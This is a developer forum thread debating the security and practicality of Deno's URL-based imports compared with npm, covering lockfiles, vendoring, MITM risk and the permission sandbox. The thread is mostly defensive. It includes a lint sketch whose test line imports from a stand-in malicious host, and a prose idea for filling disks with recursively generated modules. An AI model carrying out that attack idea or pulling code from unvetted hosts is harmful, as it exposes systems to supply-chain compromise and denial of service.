Not saying Deno won't devolve into this sad state at some point. Maybe it already has. But it seems to try to combat some of the problems by being honest and pragmatic about dependencies, promoting minimal external tooling and removing some of the dangerous abstractions from NPM.

To me Deno seems like a desperately needed and well thought out reset button.

Semi-related rant over.


It's different because it doesn't rely on require() which is non-standard JavaScript.


Node v14 supports ESM modules and the import syntax, which is standard Javascript.


setTimeout is non-standard JavaScript too but I bet your code base has multiple instances of its usage.


Is it? It's on every browser I know.



Ah, makes sense, it's not part of the spec so it might be missing on other environments. Thank you.


Then you either vendor as others have said, or use the built in bundle tool to produce a single js file of all your code including dependencies.

https://deno.land/manual/tools/bundler
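
For example (the entry point name is hypothetical):

  deno bundle main.ts app.bundle.js

This produces one self-contained JS file with all remote imports resolved and inlined, which you can ship or vendor like any other build artifact.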


Several responses to your concern but all of them seem to say "you can cache dependencies". How does Deno find dependencies ahead of runtime? Does Deno not offer dynamic imports at all?

If I have an application that uses, say, moment.js and want to import a specific locale, typically this is done using a dynamic import.


You'd deploy builds that include all the dependencies. This isn't Node where you have to download all deps on your production server; they are built into your deployed files.


Ever used Go? Not that different.


Go supports "vendor" folders for storing dependencies locally after initial download. That combined with Go Modules means you can handle everything locally and (I believe) reproducibly.


deno has the same support with $DENO_DIR and a lockfile.


Reproducible builds, sure. Security? that's a different story.

https://github.com/ChALkeR/notes/blob/master/Gathering-weak-...

- node ships with npm

- npm has a high number of dependencies

- npm does not implement good practices around authentication.

Can someone compromise npm itself? probably, according to that article.


How is this different from requiring npm to be up to install packages?


I like what Deno is selling. URL-like import paths are great; I don't know why people are dismissing them. It is easy to get up and running quickly.

Looks like my personal law/rule is in effect again: The harsher HN critics are, the more successful the product will be. I have no doubt Deno will be successful.


Your law is hilarious. I tend to check the comments before reading a post: if they say the idea is terrible, I know I should read it.


The GoLang-like URL import and dependency management are indeed an innovation in simplicity while simultaneously offering better compatibility with browser JavaScript.

Perhaps the HN-hate is not about simplified greenfield tech as much as it is about breaking established brownfield processes and modules.


My concern is what happens when popular-library.io goes down or gets hacked?

Or how about attack vectors like DNS poisoning? or government-based firewalls?

I know there's this[1], but somehow I still feel uneasy because the web is so fragile and ephemeral...

At the very least I would like to have the standard library offline...

[1] https://github.com/denoland/deno/blob/master/docs/linking_to...


> what happens when popular-library.io goes down or gets hacked?

What is anyone going to do about it? Anything has a chance of getting hacked or going down just when you need it, be it GitHub, npmjs.org...

Blaming the tool for not having a protection against DNS poisoning is a bit far fetched.


ultimately i guess it is about how/if deno caches its imports. with node.js/npm you have the exact same problems, just the source & sink occur at different places (package installation)


With Node.js you install the packages in a dev environment and test extensively, then push all the code, including the node_modules folder, to production. Running npm on the prod server is forbidden. At least in theory =)


You can always download the scripts and host them yourself, right?


Do you also share these concerns about golang? Isn’t it basically the same system?


Golang does have https://proxy.golang.org/, which is fairly recent, but yes this is absolutely a problem in Go.

See the "go-bindata" problem.


This seems to be the case, yes. It's like the critics unconsciously know it's better, and that is where their energy comes from.


More of a "there can't be better stuff than what I'm accustomed to and like" feeling.


> It is easy to get up-and-running quickly.

Almost all successful, mainstream techs are like that. From a purely technical perspective, they are awful (or were awful at launch); they were just adopted because they were easy to use. When I say awful, I mean for professional use in high impact environments: financial, healthcare, automotive, etc.

Examples: VB/VBA, Javascript, PHP, MySQL, Mongo, Docker, Node.

Few people would argue that except for ease of use and ubiquity, any of these techs were superior to their competitors at launch or even a few years after.

After a while what happens is that these techs become entrenched and more serious devs have to dig in and they generally make these techs bearable. See Javascript before V8 and after, as an example.

A big chunk of the HN crowd is high powered professional developers, people working for FAANGs and startups with interesting domains. It's only normal they criticize what they consider half-baked tech.


Forget the (reasonable) security and reliability concerns people have already brought up with regard to importing bare URLs. How about just the basic features of dealing with other people's code: how am I supposed to update packages? Do we write some separate tool (but not a package management tool!) that parses out import URLs, increments the semver, and... cURLs to see if a new version exists? Like if I am currently importing "https://whatever.com/blah@1.0.1", do I just poll to see if "1.0.2" exists? Maybe check for "2.0.0" too just in case? Is the expectation that I should be checking the blogs of all these packages myself for minor updates? Then, if you get past that, you have a huge N-line change where N is every file that references that package, and thus inlines the versioning information, instead of a simple and readable one-line diff that shows "- blah: 1.0.1, + blah: 1.0.2".


Another thing is that with package.json every dependency can say which versions of its dependencies it works with. This lets you update a dependency that is used by other dependencies and only have a single version (most up to date) of it. Some package managers also let you completely override a version that one of your dependencies uses, allowing you to force the use of a newer version.

With Deno, both of these use cases seem way harder to satisfy. None of your dependencies can say "hey, I work with versions 1.1 to 1.3 of this dependency", instead they link to a hardcoded URL. The best chance of overriding or updating anything is if Deno supports a way to shim dependencies, but even then you might need to manually analyze your dependency tree and shim a whole bunch of URLs of the same library. On top of that, as soon as you update anything, your shims might be out of date and you need to go through the whole process again. To make the whole process easier, Deno could compare checksums of the dependencies it downloads and through that it could show you a list of URLs that all return the same library, but this would be like the reverse of package.json: instead of centrally managing your dependencies, you look at your dependencies after they have been imported and then try to make sense of it.


> None of your dependencies can say "hey, I work with versions 1.1 to 1.3 of this dependency"

That's a real problem that needs to be solved.

Also, what happens when two lib A and lib B depend on different versions of lib C? Each have their own scoped instance of C?


The Deno solution is either:

* A deps.ts that handles all external dependencies and re-exports them

* Import maps

Neither of these really give you a way to do the equivalent of "npm update". But I almost never want to update all my packages at once.


You don’t like checking for security updates?


Lately I just merge GitHub's pull requests for that. ;)

I don't like running "npm update" to try and get security updates, though. npm packages aren't very rigorous about PATCH level changes.


Well, at least you seem to be using cargo for the rust parts.

Since this stuff is breaking and new anyway, it would be nice to see dependency resolution and a reasonable way to get historically reproducible builds (prod runs server 1.0.4 which is 5 years old, let's build that locally to do some bug fixing, using the same dependencies, gradually bringing it up to current 3.7.1...).

Sounds like the lifecycle management of Deno projects will be about as much fun as PHP before package management. And about as reliable.


I prefer a unix approach where each tool does a single thing.

The runtime does runtime things and someone can build a package manager to do package manager things.

The benefit of having runtime + package management bundled into one is you have an opinionated and standard way of doing things - the downside is if the package manager stinks then the whole ecosystem stinks.


Just come up with a convention, like hosting a file called version.ts that lists all available versions. Brute-forcing for available versions sounds dumb.


Yes, that is of course the point. There's an infinite number of possible later versions to check for. The suggestion to poll for new versions using cURL was sarcastic. These "conventions" you speak of actually get handled by... package managers! If not, everyone who hosts a package needs to "know" about magic files and make sure they build them following a spec that isn't enforced by anyone and doesn't break immediately, but rather much later when someone tries to update. It's like everyone managing their own database row with an informally agreed upon database schema.


Maybe a convention will arise, that you do all the imports in one file (basically like a `package.json` file) and import that from the rest of your code? It seems hackish to me but could work.


This is explicitly listed as best practice by Deno [1], but it doesn't handle the updating problem at all.

[1] https://deno.land/manual/linking_to_external_code#it-seems-u...


You have to stop thinking in terms of NPM where it takes 1000000000 packages to do anything. A Deno application is designed to be distributed as a single file. You can override the default behavior to have NPM-like stupidity, but if that is really your goal, why bother moving to Deno in the first place?


Forget 10000000 packages. Many languages often make use of 10s of packages. If I have several projects, each with around 10 packages, and no automated way to just check if all my projects’ respective dependencies have security updates that could be applied, it seems to go against the stated security goal.

Separately I’m not sure what is enforcing this “small dependency graph” aside from making it hard to import things I guess. I wouldn’t be surprised if you end up with the normal behavior of people coming up with cool things and other people importing them.


> and no automated way to just check if all my projects’ respective dependencies have security updates

Dependency management is a major cornerstone of any infosec program. There is more to that than just auto-installing a new dependency version.

> I’m not sure what is enforcing this “small dependency graph”

Because a large dependency graph is slow, insecure, and fragile.


> Dependency management is a major cornerstone of any infosec program. There is more to that than just auto-installing a new dependency version.

We seem to agree? I said check. It’s very useful to have something tell you what’s out of date and what the updates are.

> Because a large dependency graph is slow, insecure, and fragile.

I asked “what”, not “why”. What is enforcing this idea you have of how Deno will be used? I feel like you want it to not be used with lots of dependencies, thus aren’t accounting for how to handle them. However, just because that’s the desired way to use it doesn’t mean it will be used that way. Lots of dependencies may end up still becoming the norm, at which point you’ll wish you would have more clearly defined how it should be done instead of letting the first third party solution win (as ended up happening with npm).


Congratulations on the 1.0 release! I've been using Deno as my primary "hacking" runtime for several months now, I appreciate how quickly I can throw together a simple script and get something working. (It's even easier than ts-node, which I primarily used previously.)

I would love to see more focus in the future on the REPL in Deno. I still find myself trying things in the Node.js REPL for the autocomplete support. I'm excited to see how Deno can take advantage of native TypeScript support to make a REPL more productive: subtle type hinting, integrated tsdocs, and type-aware autocomplete (especially for a future pipeline operator).


Seconded, a Deno TS REPL would be amazing, but they probably have a few bigger fish to fry yet :)


> bigger fish to fry

> fish

I see what you did there, and I approve.


I evaluated replacing ts-node with Deno, but if I use `-T` and install ts-node globally, that seems equivalent to Deno to me.

I think stepping outside the npm ecosystem is going to be a bigger issue than people think.


Repl.it recently announced a Deno REPL https://repl.it/languages/deno


I really wish they had docker-compose / Terraform support. Just not sure at what point that becomes "free" hosting.


I wonder if it's conceivable to ever write TypeScript in a REPL.


There are both OCaml and Haskell REPLs, so it can be done with languages whose type systems are the focus. Not sure if there's anything specific about TypeScript that would make it hard, though.


Does anyone else see importing directly from a URL as a larger security/reliability issue than the currently imperfect module system?

I'm sure I'm missing something obvious in that example, but that capability terrifies me.


I thought a lot about it, and it seems about as secure as node_modules, because anybody can publish to npm anyway. You can even depend on a non-npm repo (GitHub, URLs...) from an npm-based package.

If you want to "feel" as safe, you have import maps in Deno, which work like package.json.

Overall, I think Deno is more secure because it cuts out the middleman (npm), and you can make an npm-style mirror with low effort - a simple fork will do. That means you can not only precisely pin which code you want, but also make sure nobody knows which packages you use.

Take it with an open mind - this is a new "JSX" or async-programming moment. People will hate it, then start to see the value of this design down the road.


> I thought a lot about it, and it seems as secure as node_modules, because anybody can publish to npm anyway

npm installs aren't the same as installing from a random URL, because:

* NPM (the org) guarantees that published versions of packages are immutable, and will never change in future. This is definitely not true for a random URL.

* NPM (the tool) stores a hash of the package in your package-lock.json, and installing via `npm ci` (which enforces the lockfile and never updates it in any case) guarantees that the package you get matches that hash.

Downloading from a random URL can return anything, at the whim of the owner or anybody else who can successfully MITM your traffic. Installing a package via npm carries that risk only the very first time you ever install it. Once you've done that, and you're happy that the version you're using is safe, you have clear guarantees about future behaviour.


My assumption would be that new middlemen will arise, but this time, you can pick which one to use.


BTW: https://github.com/denoland/deno/issues/1063

They know there is a bad MITM vector and won't fix it.


This is why I think a content-addressable store like IPFS would shine when paired with Deno.


That solves this specific problem nicely, although AFAIK IPFS doesn't guarantee long-term availability of any content, right? If you depend on a package version that's not sufficiently popular, it could disappear, and then you're in major trouble.

It'd be interesting to look at ways to mitigate that by requiring anybody using a package version to rehost it for others (since they have a copy locally anyway, by definition). But then you're talking about some kind of IPFS server built into your package manager, which now needs to be always running, and this starts to get seriously complicated & practically challenging...


One advantage of having a centralized repository is that the maintainers of that repository have the ability to remove genuinely malicious changes (even if it's at the expense of breaking builds). Eliminating the middle man isn't always a great thing when one of the people on the end is acting maliciously.


I'm just thinking out loud here, but it seems to me that you could just make sure you're importing all your dependencies from trusted package repos, right? And since the URL for a package is right there in the `import` statement, it seems like it'd be pretty easy to lint for untrusted imports.
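
For illustration, a toy version of that lint could be as simple as the sketch below (the allowlist and the regex are placeholders; a real tool would want to walk the AST with the TypeScript compiler instead):

    // Flag import URLs whose host isn't on a trusted allowlist.
    const TRUSTED_HOSTS = ["deno.land"]; // hypothetical allowlist

    function findUntrustedImports(source: string): string[] {
      const matches = source.match(/from\s+"(https?:\/\/[^"]+)"/g) ?? [];
      return matches
        .map((m) => m.slice(m.indexOf('"') + 1, -1))
        .filter((url) => !TRUSTED_HOSTS.includes(new URL(url).hostname));
    }

    // Returns ["https://evil.example/mod.ts"]
    findUntrustedImports(`import { x } from "https://evil.example/mod.ts";`);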

I don't detest NPM in the way that some people do, but I have always worried about the implications of the fact that nearly the entire community relies on their registry. If they ever fell over completely, they would have hamstrung a huge amount of the JS community.


It's basically the same "exposure" as importing a random npm package, but it has the benefit of being explicit when you do it.

It's also exactly what the websites you visit do. ;)


> It's basically the same "exposure" as importing a random npm package, but it has the benefit of being explicit when you do it.

This is definitely false. For all the problems with the NPM registry and the Node dependency situation, an NPM package at a specific version is not just at the whims of whatever happens to be at the other end of a URL at any given moment it's requested. This is a huge vulnerability that the Node/NPM world does not currently have.


That is a fair point. I don't think most people who use npm packages really pay much attention, though, and you're still just an npm update away from getting something unexpected (because really, who puts explicit versions in package.json?).

Deno does have lockfiles: https://deno.land/manual/linking_to_external_code/integrity_...

I prefer imports from URLs. And I loathe npm. I get why people would disagree though.


Deno has lock files and caches files locally on first import.


I'm not sure how a lock file would help in this scenario, unless you're also committing your cache to source control (like a lot of folks did in the bad old days of NPM). The local cache is great, but that doesn't prevent the content of those URLs changing for someone who doesn't have access to your cache.


Yeah, but we regularly clear out our cache and lock files, so this doesn't really solve the issue, unless you're committing all of your packages.


Why are you _regularly_ clearing lock files? If you're bypassing lock files you're going to have the exact same issue with npm or yarn or any other package manager that downloads from the internet.


Dunno about OP, but I pin versions in package.json because it allows me to control the versions and upgrade major versions only explicitly and when necessary, relying on the lock file to keep things the same between commit time and the production build.


That doesn't actually work and gives you a false sense of reproducibility and stability. Sure, your top-level dependencies might not change without explicit changes to package.json, but every time you run npm install without a lock file, all transitive dependencies are re-resolved and can change.

Always commit your lock files, people.


What about the dependencies of your dependencies? You're gonna get burned when a breaking change gets introduced a few levels deeper than your package.json. Not everyone follows semver perfectly, and sometimes malicious code gets distributed as one of these transitive dependencies.


That's fine for one developer pushing to production from their own machine. But if you have a CI server and you're working with other people, you're going to want to know that everyone is working with the same modules.


What! Clearing lock files seems wild. How do you know you're getting the right code when you install dependencies?


For Deno, the only issue is the first time, when you do not have it cached. Deno compiles in all dependencies when building, so the only point of failure is the machine you're building on.

I don’t know the state of the art anymore, but I’m sure they have ways to make it easy to vendor deps in the repo.


> It's basically the same "exposure" as importing a random npm package, but it has the benefit of being explicit when you do it.

I'm not sure how this works in detail here, but at least with NPM you get a chance to download packages, inspect them, and pin the versions if so desired. Importantly, this also gives you control over your transitive dependencies.

This seems more like the curl | bash school of package management.

Edit: This is explained in more detail at https://deno.land/manual/linking_to_external_code and indeed seems a lot more sane.

> It's also exactly what the websites you visit do. ;)

Well yes, and it causes huge problems there already - see the whole mess we have with trackers and page bloat.


The good thing about this is that you can effectively build a registry service offering the same level of trust that npm provides, because at the end of the day that is the only differentiator in this scenario - npm can just as well return malicious code.


Thanks for sharing that link. Seems much more sane, but not without issues. I'm sure this will continue to be iterated upon.

Even with all of NPM's flaws, I do feel this is a bit of throwing the baby out with the bathwater. Time will tell.


AFAIK there is no option to allow a website to read and write arbitrary files anywhere on my hard drive, period. At most, a website can ask the user to select a file or offer one for download. In the future, maybe it can be given a domain-specific folder.

That's not true here. If I'm running a web server, I'm going to need to give the app permission to read the files being served and access to the database. That's something that never happens in the browser.


The TL;DR is that Deno also gives you a chance to download and inspect packages, and then lock dependencies. The mechanism for importing is different, but the tooling is good.


Sure do. I wonder if they have a checksum mechanism like browsers do?

You can add an “integrity” attribute to script tags in the browser.

https://developer.mozilla.org/en-US/docs/Web/Security/Subres...


One advantage of URLs is that you can link to a specific git SHA, tag, or branch for a dependency, e.g. on GitHub.
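
For example (the repository, file, and export names here are made up), the tag or commit goes right in the path:

    // pinned to a tag
    import { helper } from "https://raw.githubusercontent.com/someuser/somelib/v1.2.3/mod.ts";
    // or pinned to an exact commit
    // import { helper } from "https://raw.githubusercontent.com/someuser/somelib/3f2c1a9/mod.ts";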


So exactly like existing tooling can already do, then?


Sure, I probably phrased that poorly -- it's not a unique advantage, but a benefit of having URLs be the only way to link to dependencies, versus a centralized, dominant package manager.


It's not just about the integrity. The URL may very well provide what it claims to provide, so checksums would match, but it's the direct downloading and running of remote code that is terrifying.

This is pretty much like all the bash one-liners piping and executing a curl/wget download. I understand there are sandbox restrictions, but are the restrictions on a per-dependency level, or on a program level?

If they are on a program level, they are essentially useless, since the first thing I'm going to do is break out of the sandbox to let my program do whatever it needs to do (read the fs, use the network, etc.). If they are on a per-dependency level, then am I really expected to manage sandbox permissions for all of my project's dependencies?


If you are afraid of "directly" downloading and executing code like that, then what do you think happens when you npm install / pip install a package? I'm very interested to hear if you can identify a new attack vector that didn't exist with the previous solutions.


You can generate modules on the fly on the server that recursively require the next generated module, blowing up your disk space. If Deno stores those files uncompressed, you can generate modules full of comments/zeros, so they compress very well for the attacker and eat a lot of space on the consumer's side.


Does Deno have some built-in way to vendor / download the imports pre-execution? I don't want my production service to fail to launch because some random repo is offline.



Yup! Deno caches remote imports.

https://deno.land/manual/linking_to_external_code


You can also use the built-in bundle command to bundle all of your dependencies and your code into a single, easily deployable file: https://deno.land/manual/tools/bundler.


Deno caches local copies and offers control over when to reload them. In terms of vendoring, you can simply download everything yourself and use local paths for imports.


How would this work with transitive dependencies? Sure I can control which parts I import myself, but how do I keep a vendored file from pulling in another URL a level deeper?


Unlike Node, recommended Deno practice is to check your dependencies into the VCS.

> Production software should always bundle its dependencies. In Deno this is done by checking the $DENO_DIR into your source control system, and specifying that path as the $DENO_DIR environmental variable at runtime.

https://deno.land/manual/linking_to_external_code


    du -hs node_modules
    
    1.7G node_modules


> in term of vendoring you can simply download everything yourself and use local paths for imports.

So I basically have to do manually what NPM/yarn already do for me?


I do not speak for the project, but based on my understanding, part of the point was to avoid the magic of npm.

You can use lock files, bundles, and many other features that make dependency management easier.


Ah, from that perspective I can see how this might appear to be better. Personally, I like the 'magic' of NPM (which, to be honest, I don't really think is all that magical - it's quite transparent what's happening behind the scenes). This 'magic' means I no longer have to write 200-line makefiles, so it definitely makes my life easier.


Some of that convenience will still be included. A couple of things Deno does differently from Node are that there is no standard index.* file to load, and import paths include the extension.


I assume you would just download the packages and serve them yourself.


Especially since HTTPS is not enforced! https://github.com/denoland/deno/issues/1063


CMIIW, but wouldn't enforced HTTPS mean you can't use intranet or localhost URLs?


You could use a flag to re-enable HTTP :)


More than likely, programming as a whole will get better because of this...

Do you trust this thing? If not, you're better off developing it yourself, or working with something you do trust.


Deno requires that you explicitly give the process the permissions it has. I think that's much better than praying that a package has not gone rogue, like with Node. If you don't trust the remote script, run it without any permissions and capture the output. Using multiple processes with explicit permissions is much safer.
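
A rough sketch of that multi-process idea, using the subprocess API roughly as it looks at 1.0 (the script name is made up, and the parent itself needs --allow-run):

    // Run an untrusted script in a child deno process with no --allow-* flags,
    // so it gets no fs/net access, and just capture what it prints.
    const p = Deno.run({
      cmd: ["deno", "run", "untrusted.ts"], // hypothetical script
      stdout: "piped",
    });
    const output = new TextDecoder().decode(await p.output());
    p.close();
    console.log("untrusted output:", output);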


I'm wondering about the practicality of importing from URLs. I didn't see it addressed, but an import like this will be awfully hard to remember.

    import { serve } from "https://deno.land/std@0.50.0/http/server.ts";
Anyone know if there are alternatives or a plan for this aside from "use an IDE to remember it for you"?


The convention is to make a `deps.ts` and re-export what you need. Like this: https://deno.land/x/collections/deps.ts

I don't find versioned URLs much more difficult to work with than package@<version> though.


I'm wondering if they'll end up adding a 'dependencies.json' to eliminate the boilerplate from 'deps.ts' and to simplify tooling. That'd be revolutionary! ;)

Jokes aside, I wonder how import-via-URL will impact tooling. Having to parse arbitrary JS (or even run it, for dynamic imports?) seems like it'd make writing a "list all dependencies" tool much harder than a "dumb" JSON/TOML/whatever file would. Though I guess Go does a similar thing, and AFAIK they're fine.


Well they do have import maps! I think everyone likes shorthand package names.
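
Roughly, an import map is a small JSON file mapping short specifiers to full URLs; sketched below in comments, along with the shortened import it enables (the exact flag for passing the map has shifted between releases and may still be unstable, so check the manual):

    // import_map.json (illustrative):
    //   { "imports": { "http/": "https://deno.land/std@0.50.0/http/" } }
    //
    // With the map supplied to deno run, the long URL shrinks to:
    import { serve } from "http/server.ts";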


You are not alone; this is very unsafe, in my humble opinion.


How is it any different than how it works in the browser?


Does it also terrify you when code running in a browser does it?


The code running in my browser isn't a multi-tenant production server, with access to the filesystem and DBs.


Except that with Deno, everything IO-related is turned off by default, and the process has to be granted access explicitly. It's the first bullet point on the landing page.

Here is the page with more detail. https://deno.land/manual/getting_started/permissions

It can even restrict access down to a specific directory or host. This is cool.
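
A hedged sketch of what that scoping looks like in practice (the file names, paths, and host are all made up; the exact flag syntax is in the manual linked above):

    // Run with something like:
    //   deno run --allow-read=/srv/static --allow-net=example.com scoped.ts
    const page = await Deno.readFile("/srv/static/index.html"); // only this dir is readable
    const res = await fetch("https://example.com/health");      // only this host is reachable
    console.log(page.byteLength, res.status);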

Whereas any NPM module can map your subnet, lift your .ssh directory, and yoink environment variables, willy-nilly.

It's happened before.


That still doesn't prevent imported modules from yoinking anything you did grant access to, though. For instance, if my service connects to a DB then `uuid` can slurp the contents.

It'd be nice to have some capability model where modules can only access things through handles passed to them, but probably infeasible for a project like this.


You can actually run things as Workers in Deno and get some sandboxing abilities: https://github.com/denoland/deno/blob/master/docs/runtime/wo...
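
A minimal sketch of the idea (file names are made up; as of 1.0, a module worker doesn't get the Deno namespace unless you explicitly opt in, which is where the sandboxing value comes from):

    // main.ts - push untrusted work into a module worker
    const worker = new Worker(
      new URL("./untrusted_worker.ts", import.meta.url).href,
      { type: "module" },
    );
    worker.postMessage({ input: "some data" });
    worker.onmessage = (e) => console.log("worker said:", e.data);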


From the article: "Also like browsers, code is executed in a secure sandbox by default. Scripts cannot access the hard drive, open network connections, or make any other potentially malicious actions without permission."


That just means you have to run with the --allow-net, --allow-read, etc. flags. But you are using those when writing any nontrivial Deno app like a webserver anyway.

"web browsers already do this ;)" isn't a good comparison.


"But I have to turn all that stuff on" is also not a good comparison.

Actually, no Deno webserver I've written gets fs access. Some only get --allow-net.
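
For example, something like this runs under nothing but --allow-net (same std import that appears elsewhere in the thread; treat it as a sketch):

    // deno run --allow-net server.ts
    import { serve } from "https://deno.land/std@0.50.0/http/server.ts";

    for await (const req of serve({ port: 8000 })) {
      req.respond({ body: "hello from a net-only process\n" });
    }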


I think that's the main selling point of Deno: sandboxing.

